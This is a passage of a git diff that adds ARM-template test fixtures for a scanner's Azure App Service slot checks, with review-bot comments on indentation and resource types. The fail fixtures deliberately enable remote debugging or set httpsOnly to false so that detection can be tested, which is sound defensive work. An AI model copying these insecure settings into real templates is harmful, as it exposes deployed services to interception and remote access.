"string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": true, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } +} + ] +} + 
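Review bot: The closing brackets at the end of this fixture are misindented — the `}` that closes the resource object sits at column 0 and the `]` that closes `resources` is indented beneath it — so the file reads as if `resources` were closed inside the resource; the JSON is still valid, but the last three lines should be `    }`, `  ]`, `}` to match the nesting used in the sibling fixtures. Consider a further failing case in which `"remoteDebuggingEnabled"` is the string `"true"` rather than the JSON boolean, since ARM templates frequently carry booleans as strings or `[parameters(...)]` expressions and the fixture set only exercises the boolean form; whether the check treats the string form as enabled cannot be told from this hunk.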
diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json
new file mode 100644
index 00000000000..4b61687f174
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": false, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json new file mode 100644 index 00000000000..370ece10d24 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json 
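Review bot: The resource in this fixture is typed `Microsoft.Web/sites`, not `Microsoft.Web/sites/slots`, although the directory is `example_AppServiceSlotDebugDisabled`; if the check's supported resource list is only the slot type, this resource is never evaluated and the explicit `"remoteDebuggingEnabled": false` pass path for a slot is not exercised, since pass2.json covers only the absent-key case. The `example_AppServiceSlotHTTPSOnly/fail.json` hunk in this commit has the same mismatch with `"httpsOnly": false` on a `Microsoft.Web/sites` resource. Either retype the resource as `"type": "Microsoft.Web/sites/slots"` or confirm that the test's expected pass/fail sets actually list these resource ids. The value `"allowedOrigins": [ "is try string to app service disallow cors" ]` looks like a placeholder carried over from another fixture; `"string"` would keep the file self-explanatory.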
@@ -0,0 +1,249 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "properties": { + "clientAffinityEnabled": "bool", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", 
+ "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ "string" ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ "string" ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": 
"string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } +} + ] +} + 
diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json
new file mode 100644
index 00000000000..ec212ee3032
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": false, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "is try string to app service disallow cors" + ], + 
"supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + 
"kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": false, + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json new file mode 100644 index 00000000000..ef06349ab79 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json 
@@ -0,0 +1,330 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + 
"hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": false, + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + 
"defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + 
"dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json new file mode 100644 index 00000000000..6897fb611b1 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json 
